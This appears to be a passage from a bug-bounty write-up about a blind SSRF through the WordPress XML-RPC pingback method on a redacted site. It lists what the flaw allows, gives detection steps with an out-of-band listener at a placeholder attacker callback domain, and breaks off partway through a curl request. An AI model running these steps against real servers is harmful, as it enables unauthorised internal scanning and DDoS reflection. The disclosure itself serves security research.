This is a very easy P4 bug.
Press enter or click to view image in full size
This bug is called BLIND SSRF VIA XMLRPC PINGBACK METHOD.
While testing the website, I discovered that the WordPress XML-RPC endpoint (/xmlrpc.php) is exposed and accepts unauthenticated pingback.ping requests. This allows an attacker to force the server to initiate outbound HTTP requests to attacker-controlled domains.
This creates a blind Server-Side Request Forgery (SSRF) primitive. The attacker can use this behaviour to:
- Discover the origin IP and network position of the server
- Potentially scan/reach internal hosts (private IP ranges)
- Abuse the site as a DDoS reflector toward any external victim
How to find it:
- Visit https://www.redacted.com/xmlrpc.php and check if it accessable or not if it is forbbiben it will show 403 FORBIDDEN. But if it is open you will see something like this:
- Prepare an out-of-band listener (Burp Collaborator / Interactsh)
- Capture its unique callback URL (e.g.,
http://<attacker-domain>.oast.me) - Send the request::
curl -s -H "Content-Type: text/xml" \
--data '<?xml…